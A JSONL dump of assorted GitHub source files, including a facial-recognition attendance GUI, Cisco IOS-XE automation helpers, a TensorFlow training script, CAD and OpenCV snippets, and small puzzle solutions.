command=self.check,height=50,width=275,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#7BC2FF\",fg_color=\"#109945\")\r\n self.accept_button_admincheck.place(x=415, y=410)\r\n \r\n \r\n def check(self):\r\n \r\n if self.adminusername.get()==\"admin\" and self.adminpass.get()==\"admin\":\r\n self.admin() \r\n else:\r\n util.msg_box('Error', 'Wrong Username or Password')\r\n \r\n\r\n def admin(self):\r\n \r\n self.admin_newwindow= tk.Toplevel(self.first_window)\r\n self.admin_newwindow.geometry(\"1100x600+350+100\")\r\n self.image_path2 = \"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/logo4.png\" \r\n self.image2 = PhotoImage(file=self.image_path2)\r\n self.image_label2 = tk.Label(self.admin_newwindow, image=self.image2)\r\n self.image_label2.pack()\r\n self.image_label2.place(x=0, y=0, width=1100, height=600)\r\n self.accept_button_admin_newwindow = customtkinter.CTkButton(master=self.admin_newwindow, text=\"Register New User\", command=self.reg,height=50,width=275,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#7BC2FF\",fg_color=\"#109945\")\r\n self.accept_button_admin_newwindow.place(x=400, y=105)\r\n self.logs_window = customtkinter.CTkButton(master=self.admin_newwindow, text=\"Download Logs\", command=self.log_window,height=50,width=285,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#7BC2FF\",fg_color=\"#109945\")\r\n self.logs_window.place(x=400, y=245)\r\n self.deluser_window=customtkinter.CTkButton(master=self.admin_newwindow, text=\"Remove Employee\", command=self.deluser,height=50,width=285,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#7BC2FF\",fg_color=\"#109945\")\r\n self.deluser_window.place(x=400, y=395)\r\n\r\n def deluser(self):\r\n self.checkadmin_newwindow.destroy()\r\n self.deleteuserwindow=tk.Toplevel(self.first_window)\r\n self.deleteuserwindow.geometry(\"1100x600+350+100\")\r\n self.image_path3 = \"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/del.png\" \r\n self.image3 = PhotoImage(file=self.image_path3)\r\n self.image_label3 = tk.Label(self.deleteuserwindow, image=self.image3)\r\n self.image_label3.pack()\r\n self.image_label3.place(x=0, y=0, width=1100, height=600)\r\n self.delusername = customtkinter.CTkEntry(self.deleteuserwindow,width=380, font=('Sans-serif', 18),corner_radius=20,placeholder_text=\"\",bg_color=\"#7BC2FF\",fg_color=\"#224957\")\r\n self.delusername.place(x=380, y=265)\r\n self.accept_button_delete = customtkinter.CTkButton(master=self.deleteuserwindow, text=\"Delete\", command=self.delete,height=50,width=275,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#7BC2FF\",fg_color=\"#109945\")\r\n self.accept_button_delete.place(x=415, y=415)\r\n \r\n def delete(self):\r\n self.main_window.destroy()\r\n self.c.execute(\"SELECT rowid FROM users WHERE id = ?\", (self.delusername.get(),))\r\n self.del_result=self.c.fetchone()\r\n if (self.del_result is None): \r\n messagebox.showinfo(\"Error\",\"No such ID exists\",parent=self.deleteuserwindow)\r\n return\r\n else:\r\n self.c.execute('DELETE FROM users WHERE id=?',(self.delusername.get(),))\r\n self.conn.commit()\r\n messagebox.showinfo(\"Sucess\",\"Record Deleted\")\r\n self.deleteuserwindow.destroy()\r\n self.admin_newwindow.destroy()\r\n\r\n def login(self):\r\n self.c.execute(\"SELECT username,id,face_descriptor FROM users\")\r\n users = self.c.fetchall()\r\n if not users:\r\n messagebox.showinfo(\"Error\",\"No users registered\")\r\n if self.flag==True:\r\n ret, frame = self.cap.read()\r\n self.current_time = datetime.datetime.now()\r\n self.most_recent_capture_arr = frame\r\n while True:\r\n self.gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n self.dets = self.face_detector(self.gray,1)\r\n \r\n while True:\r\n try:\r\n self.shape = self.shape_predictor(self.gray, self.dets[0])\r\n self.face_descriptor = self.face_recognizer.compute_face_descriptor(frame, self.shape)\r\n self.face_descriptor_str = ','.join(str(e) for e in self.face_descriptor)\r\n break\r\n except IndexError:\r\n break\r\n except AttributeError:\r\n break\r\n for user in users:\r\n self.stored_face_descriptor = np.array([float(e) for e in user[2].split(',')])\r\n self.distance = np.linalg.norm(self.face_descriptor - self.stored_face_descriptor)\r\n if self.distance < 0.4: # Adjust this threshold based on your needs\r\n messagebox.showinfo(\"Success\", f\"Logged in as {user[0]} at {self.current_time}\",parent=self.main_window)\r\n \r\n formatted_date = self.current_time.strftime('%Y-%m-%d %H:%M:%S')\r\n self.d.execute(\"INSERT INTO logs (id,logintime_time) VALUES (?,?)\", (user[1],formatted_date))\r\n self.conn.commit()\r\n return\r\n messagebox.showinfo(\"Error\", \"No valid face found\",parent=self.main_window) \r\n return\r\n else:\r\n messagebox.showinfo(\"Error\",\"No valid face found\",parent=self.main_window)\r\n \r\n\r\n def logout(self):\r\n self.c.execute(\"SELECT username,id,face_descriptor FROM users\")\r\n users = self.c.fetchall()\r\n if not users:\r\n messagebox.showinfo(\"Error\",\"No users registered\",parent=self.main_window)\r\n if self.flag==True:\r\n ret, frame = self.cap.read()\r\n self.current_time = datetime.datetime.now()\r\n self.most_recent_capture_arr = frame\r\n while True:\r\n self.gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n self.dets = self.face_detector(self.gray,1)\r\n while True:\r\n try:\r\n self.shape = self.shape_predictor(self.gray, self.dets[0])\r\n self.face_descriptor = self.face_recognizer.compute_face_descriptor(frame, self.shape)\r\n self.face_descriptor_str = ','.join(str(e) for e in self.face_descriptor)\r\n break\r\n except IndexError:\r\n break\r\n except AttributeError:\r\n break\r\n \r\n self.c.execute(\"SELECT username,id,face_descriptor FROM users\")\r\n users = self.c.fetchall()\r\n \r\n for user in users:\r\n self.stored_face_descriptor = np.array([float(e) for e in user[2].split(',')])\r\n self.distance = np.linalg.norm(self.face_descriptor - self.stored_face_descriptor)\r\n if self.distance < 0.4: # Adjust this threshold based on your needs\r\n messagebox.showinfo(\"Success\", f\"Logged out as {user[0]} at {self.current_time}\",parent=self.main_window)\r\n formatted_date = self.current_time.strftime('%Y-%m-%d %H:%M:%S')\r\n \r\n self.d.execute(\"INSERT INTO logs (id,logouttime_time) VALUES (?,?)\", (user[1],formatted_date))\r\n self.conn.commit()\r\n return\r\n return\r\n else:\r\n messagebox.showinfo(\"Error\",\"No valid face found\",parent=self.main_window)\r\n def add_img_to_label(self, label):\r\n\r\n imgtk = ImageTk.PhotoImage(image=self.most_recent_capture_pil)\r\n label.imgtk = imgtk\r\n label.configure(image=imgtk)\r\n\r\n self.register_new_user_capture = self.most_recent_capture_arr.copy()\r\n\r\n def start(self):\r\n\r\n self.first_window.mainloop()\r\n\r\n def accept_register_new_user(self):\r\n\r\n self.captureface(self.name.get(),self.empid.get())\r\n self.checkadmin_newwindow.destroy()\r\n self.admin_newwindow.destroy()\r\n def try_again_register_new_user(self):\r\n\r\n self.adminmain_window.destroy()\r\n\r\n def logs(self):\r\n\r\n query = \"SELECT * FROM logs\"\r\n df = pd.read_sql(query, self.conn)\r\n df.to_excel(\"C:/Users/akash/Desktop/data/logs.xlsx\")\r\n messagebox.showinfo(\"Success\",\"Logs exported\")\r\n self.checkadmin_newwindow.destroy()\r\n self.admin_newwindow.destroy()\r\n self.main_window.destroy()\r\n \r\n def user(self):\r\n query = \"SELECT id,username FROM users\"\r\n df = pd.read_sql(query, self.conn)\r\n df.to_excel(\"C:/Users/akash/Desktop/data/users.xlsx\")\r\n messagebox.showinfo(\"Success\",\"Logs exported\")\r\n self.checkadmin_newwindow.destroy()\r\n self.admin_newwindow.destroy()\r\n def log_window(self):\r\n \r\n self.log_newwindow= tk.Toplevel(self.first_window)\r\n self.log_newwindow.geometry(\"1100x600+350+100\")\r\n self.image_pathl = \"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/logs.png\" \r\n self.imagel = PhotoImage(file=self.image_pathl)\r\n self.image_labell = tk.Label(self.log_newwindow, image=self.imagel)\r\n self.image_labell.pack()\r\n self.image_labell.place(x=0, y=0, width=1100, height=600)\r\n self.accept_button_log_newwindow = customtkinter.CTkButton(master=self.log_newwindow, text=\"Download Login/Logout Info\", command=self.logs,height=50,width=325,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#7BC2FF\",fg_color=\"#109945\")\r\n self.accept_button_log_newwindow.place(x=330, y=205)\r\n self.logs_window = customtkinter.CTkButton(master=self.log_newwindow, text=\"Download Users\", command=self.user,height=50,width=325,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#7BC2FF\",fg_color=\"#109945\")\r\n self.logs_window.place(x=380, y=345)\r\n \r\nif __name__ == \"__main__\":\r\n app = App()\r\n app.start()\r\n ","repo_name":"aks32003/FacialRecognition","sub_path":"mainproject.py","file_name":"mainproject.py","file_ext":"py","file_size_in_byte":20993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"3303005108","text":"def put_bomb():\r\n global I, J, mat, t\r\n for i in range(I):\r\n for j in range(J):\r\n if not mat[i][j]:\r\n mat[i][j] = t\r\n\r\ndef print_mat():\r\n global I, J, mat\r\n for i in range(I):\r\n for j in range(J):\r\n mat[i][j] = 'O' if mat[i][j] else '.'\r\n for l in mat:\r\n print(*l, sep=\"\")\r\n\r\ndef boom():\r\n global I, J, mat, t, boom_soon_list\r\n\r\n def boom_one(i, j):\r\n global I, J, mat\r\n for di, dj in ((0,0),(-1,0),(1,0),(0,1),(0,-1)):\r\n si, sj = i+di, j+dj\r\n if not (0<=siX\")\n .workplane()\n .circle(dims.bearing.inner.shaft_od / 2)\n .extrude(dims.bearing.inner.width)\n .faces(\"Z\")\n .workplane(centerOption=\"CenterOfMass\")\n .circle(dims.body.width / 2)\n .circle(leg.dims.id / 2)\n .cutBlind(-dims.body.leg_insertion)\n .faces(\">Z[-2]\")\n .tag(\"leg_mount_face\")\n .end()\n .center(0, 0)\n .hole(6, 10)\n)\n\nassy = cq.Assembly(body, name=\"body\", color=cq.Color(0.05, 0.05, 0.05))\nassy.add(bearing_outer, name=\"bearing_outer\", color=cq.Color(1.0, 0.99, 0.82))\nassy.add(bearing_inner, name=\"bearing_inner\", color=cq.Color(1.0, 0.99, 0.82))\nassy.constrain(\n \"bearing_outer@faces@>X\",\n \"body?bearing_inner_face\",\n \"Plane\",\n)\nassy.constrain(\n \"bearing_inner@faces@>X[1]\",\n \"bearing_outer@faces@>X[0]\",\n \"Plane\",\n)\nassy.solve()\n\nif \"show_object\" in locals():\n show_object(assy)\n","repo_name":"marcus7070/wheel-arch","sub_path":"leg_end.py","file_name":"leg_end.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"25791762795","text":"from .. import loader, utils\r\nfrom time import sleep\r\n\r\n\r\n\r\nclass TimerMod(loader.Module):\r\n \"\"\"Timer\"\"\" \r\n strings = {'name': 'Timer'} \r\n \r\n async def timercmd(self, event):\r\n \"\"\"Timer sec\"\"\"\r\n \r\n time = utils.get_args_raw(event)\r\n \r\n try:\r\n time = int(time)\r\n for i in range(time):\r\n await event.edit(str(time) + ' sec')\r\n sleep(1)\r\n time-=1\r\n await event.edit('Time is up!')\r\n\r\n\r\n except:\r\n await event.edit('Error: Invalid number')\r\n\r\n ","repo_name":"Yu-225/FTG-Modules","sub_path":"Timer.py","file_name":"Timer.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"24448215395","text":"import argparse\nimport os\nimport json\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\n\n\nif __name__ =='__main__':\n\n parser = argparse.ArgumentParser()\n\n # hyperparameters sent by the client are passed as command-line arguments to the script.\n parser.add_argument('--epochs', type=int, default=10)\n parser.add_argument('--gibberish', type=int, default=10)\n parser.add_argument('--train', type=str, default=os.environ.get('SM_CHANNEL_TRAIN'))\n parser.add_argument('--sm-model-dir', type=str, default=os.environ.get('SM_MODEL_DIR'))\n args, _ = parser.parse_known_args()\n \n print(args)\n \n model=tf.keras.models.Sequential()\n model.add(tf.keras.layers.Conv2D(filters=16,kernel_size=(3,3),activation='relu',input_shape=(128,128,3)))\n model.add(tf.keras.layers.MaxPooling2D((2,2)))\n model.add(tf.keras.layers.Conv2D(filters=64,kernel_size=(3,3),activation='relu'))\n model.add(tf.keras.layers.MaxPooling2D((2,2)))\n model.add(tf.keras.layers.Conv2D(filters=128,kernel_size=(3,3),activation='relu'))\n model.add(tf.keras.layers.MaxPooling2D((2,2)))\n model.add(tf.keras.layers.Conv2D(filters=256,kernel_size=(2,2),activation='relu'))\n model.add(tf.keras.layers.MaxPooling2D((2,2)))\n model.add(tf.keras.layers.Conv2D(filters=512,kernel_size=(2,2),activation='relu'))\n model.add(tf.keras.layers.MaxPooling2D((2,2)))\n# model.add(tf.keras.layers.Conv2D(filters=1024,kernel_size=(3,3),activation='relu'))\n# model.add(tf.keras.layers.MaxPooling2D((2,2)))\n# model.add(tf.keras.layers.Dropout(0.5))\n model.add(tf.keras.layers.Flatten())\n model.add(tf.keras.layers.Dense(100,activation='relu'))\n model.add(tf.keras.layers.Dropout(0.5))\n model.add(tf.keras.layers.Dense(2,activation='softmax'))\n print(model.summary())\n model.compile(optimizer='adam',loss='categorical_crossentropy',metrics=['accuracy'])\n \n \n# model=tf.keras.models.Sequential()\n# model.add(tf.keras.applications.mobilenet_v2.MobileNetV2(include_top=False,pooling='avg',weights='imagenet',input_shape=(128,128,3)))\n# model.add(tf.keras.layers.Dropout(0.5))\n# model.add(tf.keras.layers.Dense(2,activation='softmax'))\n# model.layers[0].trainable= False\n# model.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])\n\n def get_train_data(location):\n print(location)\n# X = np.load(os.path.join(location, 'training.npz'))['xtrain']\n# y=np.load(os.path.join(location, 'training.npz'))['ytrain']\n datagen=tf.keras.preprocessing.image.ImageDataGenerator(samplewise_center=True,horizontal_flip=True,validation_split=0.3)\n datagen_train_flow_object=datagen.flow_from_directory(os.path.join(location, 'train'),target_size=(128,128),batch_size=12)\n return datagen_train_flow_object\n\n \n \n datagen_flow_object=get_train_data(args.train)\n# print(f'Xarray {X} type :{X.dtype} shape: {X.shape}')\n# print(f'Yarray {y} type :{y.dtype} shape: {y.shape}')\n r=model.fit_generator(datagen_flow_object,epochs=args.epochs)\n# print(model.weights)\n# model.save(os.path.join(args.sm_model_dir, '000000001'), 'my_model.h5')","repo_name":"abhijitshingote/aws_sagemaker_tensorflow","sub_path":"cats_dogs_sagemaker_train_script.py","file_name":"cats_dogs_sagemaker_train_script.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"19340125973","text":"from . import Indicator\n\n\nclass sma(Indicator):\n '''\n Non-weighted average of the last n periods\n\n Formula:\n - movav = Sum(data, period) / period\n\n See also:\n - http://en.wikipedia.org/wiki/Moving_average#Simple_moving_average\n '''\n group = 'overlap'\n alias = 'SMA', 'SimpleMovingAverage'\n outputs = 'sma'\n params = (\n ('period', 30, 'Period for the moving average calculation'),\n )\n\n def __init__(self):\n self.o.sma = self.i0.rolling(window=self.p.period).mean()\n","repo_name":"mementum/bta-lib","sub_path":"btalib/indicators/sma.py","file_name":"sma.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":424,"dataset":"github-code","pt":"94"}
+{"seq_id":"7459542000","text":"\nfrom setuptools import setup\n\nwith open(\"README.md\", \"r\") as f:\n long_description = f.read()\n\nsetup(\n name=\"avair.ai\",\n version=\"0.0.1\",\n description=\"Intelligent birdcam\",\n author=\"Jori van Lier\",\n long_description=long_description,\n author_email=\"jori@jvlanalytics.nl\",\n packages=[\"aviar\"],\n install_requires=[\n \"numpy>=1.18.0\",\n \"matplotlib>=3.2.0\",\n \"torch==1.4.0\",\n \"torchvision==0.5.0\",\n \"fastai==1.0.61\"\n ],\n extras_require={\n \"test\": {\n \"flake8\",\n \"pep8-naming\",\n \"pytest\"\n },\n },\n scripts=[\"daq_infer.py\"]\n)\n","repo_name":"jvanlier/aviar.ai","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"36114912252","text":"'''IOSXE execute functions for platform'''\n\n# Python\nimport logging\n\n# Genie\nfrom genie.harness.utils import connect_device\nfrom genie.utils.timeout import Timeout\nfrom genie.metaparser.util.exceptions import SchemaEmptyParserError\n\n# Unicon\nfrom unicon.eal.dialogs import Statement, Dialog\nfrom unicon.core.errors import StateMachineError\n\n# Logger\n\nlog = logging.getLogger(__name__)\n\n\ndef execute_delete_boot_variable(device, boot_images, timeout=300):\n ''' Set the boot variables\n Args:\n device ('obj'): Device object\n boot_images ('str'): System image to delete as boot variable\n timeout ('int'): Max time to delete boot vars in seconds\n '''\n\n for image in boot_images:\n try:\n device.configure(\"no boot system {}\".format(image), timeout=timeout)\n except Exception as e:\n raise Exception(\"Failed to delete boot variables on '{}'\\n{}\".\\\n format(device.name, str(e)))\n else:\n log.info(\"Deleted '{}' from BOOT variable\".format(image))\n\n\ndef execute_set_boot_variable(device, boot_images, timeout=300):\n ''' Set the boot variables\n Args:\n device ('obj'): Device object\n boot_images ('str'): System image to set as boot variable\n timeout ('int'): Max time to set boot vars in seconds\n '''\n\n for image in boot_images:\n try:\n device.configure(\"boot system {}\".format(image), timeout=timeout)\n except Exception as e:\n raise Exception(\"Failed to set boot variables on '{}'\\n{}\".\\\n format(device.name, str(e)))\n else:\n log.info(\"Added '{}' to BOOT variable\".format(image))\n\n\ndef execute_set_config_register(device, config_register, timeout=300):\n '''Set config register to load image in boot variable\n Args:\n device ('obj'): Device object\n config_reg ('str'): Hexadecimal value to set the config register to\n timeout ('int'): Max time to set config-register in seconds\n '''\n\n try:\n device.configure(\"config-register {}\".format(config_register),\n timeout=timeout)\n except Exception as e:\n raise Exception(\"Failed to set config register for '{d}'\\n{e}\".\\\n format(d=device.name, e=str(e)))\n else:\n log.info(\"Set config-register to '{}'\".format(config_register))\n\n\ndef execute_write_erase(device, timeout=300):\n ''' Execute 'write erase' on the device\n Args:\n device ('obj'): Device object\n timeout ('int'): Max time to for write erase to complete in seconds\n '''\n\n log.info(\"Executing 'write erase' on the device\")\n\n # Unicon Statement/Dialog\n write_erase = Statement(\n pattern=r\".*remove all configuration files\\! Continue\\? \\[confirm\\]\",\n action='sendline()',\n loop_continue=True,\n continue_timer=False)\n\n # Add permisson denied to error pattern\n origin = list(device.execute.error_pattern)\n error_pattern = ['.*[Pp]ermission denied.*']\n error_pattern.extend(origin)\n\n try:\n output = device.execute(\"write erase\", reply=Dialog([write_erase]),\n timeout=timeout, error_pattern=error_pattern)\n except Exception as err:\n log.error(\"Failed to write erase: {err}\".format(err=err))\n raise Exception(err)\n finally:\n # restore original error pattern\n device.execute.error_pattern = origin\n\n if \"[OK]\" in output:\n log.info(\"Successfully executed 'write erase'\")\n else:\n raise Exception(\"Failed to execute 'write erase'\")\n\n\ndef execute_write_memory(device, timeout=300):\n ''' Execute 'write memory' on the device\n Args:\n device ('obj'): Device object\n timeout ('int'): Max time to for write memory to complete in seconds\n '''\n\n log.info(\"Executing 'write memory' on the device\")\n\n try:\n output = device.execute(\"write memory\", timeout=timeout)\n except Exception as err:\n log.error(\"Failed to execute 'write memory'\\n{err}\".format(err=err))\n raise Exception(err)\n\n if \"[OK]\" in output:\n log.info(\"Successfully executed 'write memory'\")\n else:\n raise Exception(\"Failed to execute 'write memory'\")\n\ndef execute_install_package(device, image_dir, image, save_system_config=True,\n timeout=660, _install=True):\n \"\"\" Installs package\n Args:\n device (\"obj\"): Device object\n image_dir (\"str\"): Directory image is located in\n image (\"str\"): Image name\n save_system_config (\"bool\"): If config changed do we save it?\n timeout (\"int\"): maximum time for install\n\n _install (\"bool\"): True to install, False to uninstall.\n Not meant to be changed manually.\n\n Raises:\n Exception\n\n Returns:\n True if install succeeded else False\n \"\"\"\n dialog = Dialog([\n Statement(pattern=r\".*Press Quit\\(q\\) to exit, you may save \"\n r\"configuration and re-enter the command\\. \"\n r\"\\[y\\/n\\/q\\]\",\n action='sendline(y)' if save_system_config else 'sendline(n)',\n loop_continue=True,\n continue_timer=False),\n Statement(pattern=r\".*This operation may require a reload of the \"\n r\"system\\. Do you want to proceed\\? \\[y\\/n\\]\",\n action='sendline(y)',\n loop_continue=True,\n continue_timer=False),\n Statement(pattern=r\"^.*RETURN to get started\",\n action='sendline()',\n loop_continue=False,\n continue_timer=False)\n ])\n\n if _install:\n cmd = \"\"\"install add file {dir}{image}\n install activate file {dir}{image}\"\"\".format(\n dir=image_dir, image=image\n )\n else:\n cmd = \"install deactivate file {dir}{image}\".format(\n dir=image_dir, image=image\n )\n\n try:\n device.execute(cmd, reply=dialog, timeout=timeout)\n except StateMachineError:\n # this will be raised after 'Return to get started' is seen\n device.destroy()\n timeout = Timeout(90, 30)\n while timeout.iterate():\n try:\n connect_device(device)\n except Exception:\n timeout.sleep()\n continue\n break\n else:\n raise Exception(\"Couldnt reconnect to the device\")\n\n if _install:\n cmd = \"install commit\"\n else:\n cmd = \"\"\"install commit\n install remove file {dir}{image}\"\"\".format(\n dir=image_dir, image=image\n )\n\n device.execute(cmd)\n\n try:\n out = device.parse(\"show install summary\")\n except SchemaEmptyParserError:\n out = {}\n\n for location in out.get(\"location\"):\n for pkg in out['location'][location]['pkg_state']:\n pkg = out['location'][location]['pkg_state'][pkg]\n if (_install and\n image in pkg['filename_version'] and\n 'C' == pkg['state']):\n # the image should exist; it was just installed\n return True\n elif (not _install and\n image in pkg['filename_version']):\n # the image should not exist; it was just uninstalled.\n return False\n\n return False if _install else True\n\ndef execute_uninstall_package(device, image_dir, image, save_system_config=True,\n timeout=660):\n \"\"\" Uninstalls package\n Args:\n device (\"obj\"): Device object\n image_dir (\"str\"): Directory image is located in\n image (\"str\"): Image name\n save_system_config (\"bool\"): If config changed do we save it?\n timeout (\"int\"): maximum time for install\n\n Raises:\n Exception\n\n Returns:\n True if install succeeded else False\n \"\"\"\n return execute_install_package(\n device, image_dir, image, save_system_config, timeout, _install=False)","repo_name":"aramidetosin/IPv6-OSPF-BGP","sub_path":"venv/lib/python3.8/site-packages/genie/libs/sdk/apis/iosxe/platform/execute.py","file_name":"execute.py","file_ext":"py","file_size_in_byte":8205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"36824308300","text":"#! /usr/bin/python3\nimport re\nfrom datetime import datetime\nimport functools\nimport sys\n\nxlist, xlistF = [], []\n\n\ndef exception_handling(func):\n @functools.wraps(func)\n def inner():\n try:\n return func()\n except FileNotFoundError as er:\n print('No Such File Found, Please Try Again!!!')\n return None\n except IndexError as er2:\n print(\"Please Enter File Path while Running the Script\")\n\n return inner\n\n\n@exception_handling\ndef file_read():\n filepath = sys.argv[1] # To catch External Vars passed while running the script. We start with [1] cause it takes the .py script itself as argument [0]\n fp = open(filepath, 'r')\n for line in fp:\n if re.search(\"localhost.com:\", line):\n temp = re.sub('[\\n: \\t]', '', line)\n elif re.search(\"Failed\", line):\n if '0' in line:\n xlist.append(temp)\n else:\n xlistF.append(temp)\n fp.close()\n sort_list(xlist, xlistF)\n out_puts()\n out_putf()\n\n\ndef sort_list(xlist, xlistF):\n global listS, listF\n xlist, listF = list(dict.fromkeys(xlist)), list(dict.fromkeys(xlistF))\n listS = (list(set(xlist).difference(set(xlistF))))\n\n\ndef out_puts():\n print('----------SUCCESS-----------')\n sfile = open('Success_Log--' + datetime.now().strftime(\"%d-%m-%Y_%I-%M-%S_%p\"), 'w')\n for line in listS:\n print(line)\n sfile.write(line)\n sfile.write(\"\\n\")\n sfile.close()\n\n\ndef out_putf():\n print('----------FAILED-----------')\n xfile = open('Failed_Log--' + datetime.now().strftime(\"%d-%m-%Y_%I-%M-%S_%p\"), 'w')\n if not listF:\n print('Nothing Failed')\n xfile.write('Nothing Failed')\n else:\n for line in listS:\n print(line)\n xfile.write(line)\n xfile.write(\"\\n\")\n xfile.close()\n\n\nfile_read()","repo_name":"som2016/Python_tutorial","sub_path":"minionscript_v1.py","file_name":"minionscript_v1.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"5067510525","text":"import math\n\nimport cv2\nimport numpy as np\n\ntxt = open(\"testData-one.txt\", encoding='utf-8-sig').readline()\narr = txt.split(\",\")\nimage = np.zeros((600, 3200), dtype=np.ubyte)\n\nfor i in range(0, 3200 - 1):\n h = int(int(arr[i]) / 1000)\n if h > 499:\n h = 499\n if h < 0:\n h = 0\n for j in range(0, 8):\n image[h - j][i] = 255\ncv2.imshow(\"image\", image)\n\n# cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\nlines = cv2.HoughLinesP(image, 1, np.pi / 180, 100, minLineLength=100, maxLineGap=0)\n\nif lines is not None:\n for i in range(0, len(lines)):\n # 向上偏移gap像素\n gap = 20\n cv2.line(image, (lines[i][0][0], lines[i][0][1]-gap), (lines[i][0][2], lines[i][0][3]-gap), 200, 3, cv2.LINE_AA)\n\ncv2.imshow(\"image\", image)\ncv2.imwrite(\"image.jpg\", image)\ncv2.waitKey(0)\n\n#\n#\n# image = cv2.imread('C:\\\\Users\\\\lin.chen1\\\\Desktop/disk1.jpg')\n# output = image.copy()\n# img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n#\n# # Find circles\n#\n# minDist = 100\n# param1 = 30 # 500\n# param2 = 50 # 500 #smaller value-> more false circles\n# minRadius = 5\n# maxRadius = 20 # 10\n#\n# # docstring of HoughCircles: HoughCircles(image, method, dp, minDist[, circles[, param1[, param2[, minRadius[, maxRadius]]]]]) -> circles\n# circles = cv2.HoughCircles(img, cv2.HOUGH_GRADIENT, 1.3, minDist, param1=param1, param2=param2, minRadius=minRadius,\n# maxRadius=maxRadius)\n#\n# # If some circle is found\n# if circles is not None:\n# # Get the (x, y, r) as integers\n# circles = np.round(circles[0, :]).astype(\"int\")\n# print(circles)\n# # loop over the circles\n# for (x, y, r) in circles:\n# cv2.circle(output, (x, y), r, (0, 255, 0), 2)\n# # show the output image\n# cv2.imshow(\"circle\", output)\n","repo_name":"aspojo/learnOpenCV","sub_path":"detectLines.py","file_name":"detectLines.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"74684381750","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 16 20:24:23 2017\n\n@author: tizianomartinhernando\n\"\"\"\n\n'''\nConfeccionar un programa que genere un número aleatorio\n entre 1 y 100 y no se muestre.\nEl operador debe tratar de adivinar el número ingresado.\nCada vez que ingrese un número mostrar un mensaje \"Gano\"\n si es igual al generado o \n \"El número aleatorio el mayor\" o\n \"El número aleatorio es menor\".\nMostrar cuando gana el jugador cuantos intentos necesitó.'''\n\nimport random\n\nintentos=0\naleatorio=random.randint(1,100)\nelegido=-1\nprint('Intenta adivinar el numero que pense entre 1 y 100: ')\nwhile (elegido!=aleatorio):\n elegido=int(input('Cual numero elige? : '))\n if aleatorio>elegido:\n print('Piense en un valor mayor')\n else:\n if aleatorio int:\n \n cost_diff = [x[0]- x[1] for x in costs]\n \n sorted_costs = [y for x,y in sorted(zip(cost_diff, costs))]\n \n length = int(len(costs)/2)\n \n total_cost = sum([x[0] for x in sorted_costs[:length]]) + sum([x[1] for x in sorted_costs[length:]])\n \n return total_cost\n \n \n","repo_name":"Ansh1234/Leetcode-June-Challenge","sub_path":"June_3.py","file_name":"June_3.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"18249567769","text":"from collections import defaultdict\n\nn = int(input())\na = [int(x) for x in input().split()]\n\ncnt = defaultdict(int)\nfor v in a:\n cnt[v] += 1\n\nans = 0\nfor v in cnt:\n ans += cnt[v]*(cnt[v]-1)//2\n\nfor v in a:\n print(ans + (cnt[v]-1)*(cnt[v]-2)//2 - cnt[v]*(cnt[v]-1)//2)","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p02732/s710022247.py","file_name":"s710022247.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
